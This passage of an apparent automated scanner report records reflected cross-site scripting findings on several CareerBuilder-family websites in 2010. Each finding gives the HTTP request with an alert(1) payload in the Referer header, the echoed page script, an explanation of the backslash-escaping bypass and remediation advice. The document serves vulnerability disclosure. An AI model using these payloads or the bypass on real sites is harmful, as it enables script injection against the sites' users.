User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8ed05\'%3balert(1)//006510e2ce1
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35302
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=1f49a9df1f41483d893475d4b6028bc6-343071432-XB-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650C2685EFEE1490492CFECC56590517CF4F40480D86473CB764C423719E60DE23B370F1C6FAC352909; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:12 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR42
Date: Sun, 14 Nov 2010 22:37:12 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Resume ...[SNIP]... Resume - Start'; s_cb.eVar8='JS_PostResumes - Stellar Resume - Start'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 8ed05\\';alert(1)//006510e2ce1'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44200\'%3balert(1)//3eb03fa9edc was submitted in the Referer HTTP header. This input was echoed as 44200\\';alert(1)//3eb03fa9edc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/companies/companysearch.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=44200\'%3balert(1)//3eb03fa9edc
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 254379
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=0ba81b5ae8db447bbabf0968b4be524f-343071320-x3-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650042EB88A707D024234D9E8BC85C0DFF5F085CBA33870C498076CFE32466C9B4F7269ED7A39C0DED8; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:19 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR39
Date: Sun, 14 Nov 2010 22:35:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='Search By Company'; s_cb.eVar8='JS_FindJobs - Search By Company'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 44200\\';alert(1)//3eb03fa9edc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fed12\'%3balert(1)//1f1d47f8f6c was submitted in the Referer HTTP header. This input was echoed as fed12\\';alert(1)//1f1d47f8f6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/companies/companysearch.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fed12\'%3balert(1)//1f1d47f8f6c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 254379
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=dd1a91d709d94aeabab216af2ec79f8f-343071633-wo-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650339CAF6C416FF52CCF9A291B968AE05F8BAFF5A714B3B4231336F52A60EE01EFDEC88E9913649017; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:40:33 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 22:40:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='Search By Company'; s_cb.eVar8='JS_FindJobs - Search By Company'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - fed12\\';alert(1)//1f1d47f8f6c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 206c2\'%3balert(1)//90ed6d566dc was submitted in the Referer HTTP header. This input was echoed as 206c2\\';alert(1)//90ed6d566dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/jobs/jobfindadv.aspx?lr=cbcb_elnh&siteid=cbcb_elnh001 HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=206c2\'%3balert(1)//90ed6d566dc
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46908
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=2cda30bb9b864ab6868e76ba05c31f3e-343071428-wy-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650C16798196E5F0343BDBA35660FED5BD6DD338CE1DFE1E6ED4F646F8909A1E3F2541114341BEA8823; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:37:08 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 22:37:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 206c2\\';alert(1)//90ed6d566dc'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 696a8\'%3balert(1)//e199ede896c was submitted in the Referer HTTP header. This input was echoed as 696a8\\';alert(1)//e199ede896c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobseeker/jobs/jobfindadv.aspx HTTP/1.1
Host: www.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=696a8\'%3balert(1)//e199ede896c
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 46908
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f3e8a81d541549ab9c8cc7c32ed9457f-343071260-XD-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65027D9A8546340C7DCF4E4ADD1377723C5AFFB1CB27CAF57D51AAFF27649C7EE0F4AB6007A06BD1C24; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:20 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 22:34:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Find t ...[SNIP]... Advanced Search - AL'; s_cb.eVar8='JS_FindJobs - Advanced Search - AL'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 696a8\\';alert(1)//e199ede896c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97b5f\'%3balert(1)//1e14e191674 was submitted in the Referer HTTP header. This input was echoed as 97b5f\\';alert(1)//1e14e191674 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerpath.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=97b5f\'%3balert(1)//1e14e191674
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18260
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=f9e52af2e97f4108862ebb1d40020c0a-343075015-x4-6; domain=.careerpath.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65012B0EBFDEAC002E3672E13135216764380C6C90F6C3DF0B43D9CF819A7181C7E74EBD8C892CA8D51; domain=.careerpath.com; expires=Mon, 14-Nov-2011 23:36:54 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR40
Date: Sun, 14 Nov 2010 23:36:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Free C ...[SNIP]... areerPath'; s_cb.prop1='Home'; s_cb.eVar8='CareerPath - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 97b5f\\';alert(1)//1e14e191674'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 685bd\'%3balert(1)//16496604f53 was submitted in the Referer HTTP header. This input was echoed as 685bd\\';alert(1)//16496604f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /career-tests/ HTTP/1.1
Host: www.careerpath.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=685bd\'%3balert(1)//16496604f53
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28243
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a3e79f1fb6c241bcb9f7b33a83956998-343074996-w7-6; domain=.careerpath.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650632295AC1CDD9553705F657A5E776EFB4CCE3F73D20D657AFBDC025A611F159C07D954FF849B5ECA; domain=.careerpath.com; expires=Mon, 14-Nov-2011 23:36:36 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR7
Date: Sun, 14 Nov 2010 23:36:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Career ...[SNIP]... eerPath'; s_cb.prop1='Tests'; s_cb.eVar8='CareerPath - Tests'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 685bd\\';alert(1)//16496604f53'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa0c\'%3balert(1)//7507414807 was submitted in the Referer HTTP header. This input was echoed as 2fa0c\\';alert(1)//7507414807 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.careerrookie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2fa0c\'%3balert(1)//7507414807
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 44542
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=4c609ccd1d474ef9b01bf61eb76f6135-343075037-we-6; domain=.careerrookie.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650A27AB6E5244FB1D5CC22ED6B2C22B20F5B98F92063A0306345F8DEDB90748B7FDD57E4FBA08DC8C9; domain=.careerrookie.com; expires=Mon, 14-Nov-2011 23:37:16 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR15
Date: Sun, 14 Nov 2010 23:37:16 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Intern ...[SNIP]... s_cb.prop1='CC Home Page'; s_cb.eVar8='js_home - CC Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2fa0c\\';alert(1)//7507414807'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af4ce\'%3balert(1)//5c6b07409fe was submitted in the Referer HTTP header. This input was echoed as af4ce\\';alert(1)//5c6b07409fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jobs/keyword/internships HTTP/1.1
Host: www.careerrookie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=af4ce\'%3balert(1)//5c6b07409fe
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 143722
Content-Type: text/html; charset=UTF-8
Content-Language: en-GB
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: internships:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=b2f0404e31c84a70924239852a0ed64f-343075067-wo-6; domain=.careerrookie.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650476D6529DC6D183BBD989F6985B3B871623375EF8CB8EF4D1ACCFF5A355DA2AF993EF6531C1AD6A3; domain=.careerrookie.com; expires=Mon, 14-Nov-2011 23:37:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:52:47 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR25
Date: Sun, 14 Nov 2010 23:37:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Intern ...[SNIP]... ps'; s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14=', '; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - af4ce\\';alert(1)//5c6b07409fe'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f326\'%3balert(1)//5d70d6edb82 was submitted in the Referer HTTP header. This input was echoed as 2f326\\';alert(1)//5d70d6edb82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2f326\'%3balert(1)//5d70d6edb82
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30307
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=35d70c9bfcb343bea4e5a29f95709b7f-343075092-R4-4; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65062343E1361F7F3943ACDA2EFAE6ADDD4E6531AE6AB39B734E844DC72DE36B63C98B8A34FBE91CDF0; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:38:12 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 23:38:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Salary ...[SNIP]... l='CBSalary'; s_cb.prop1='Home'; s_cb.eVar8='CBSalary - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2f326\\';alert(1)//5d70d6edb82'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c892\'%3balert(1)//157cc6ae305 was submitted in the Referer HTTP header. This input was echoed as 2c892\\';alert(1)//157cc6ae305 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
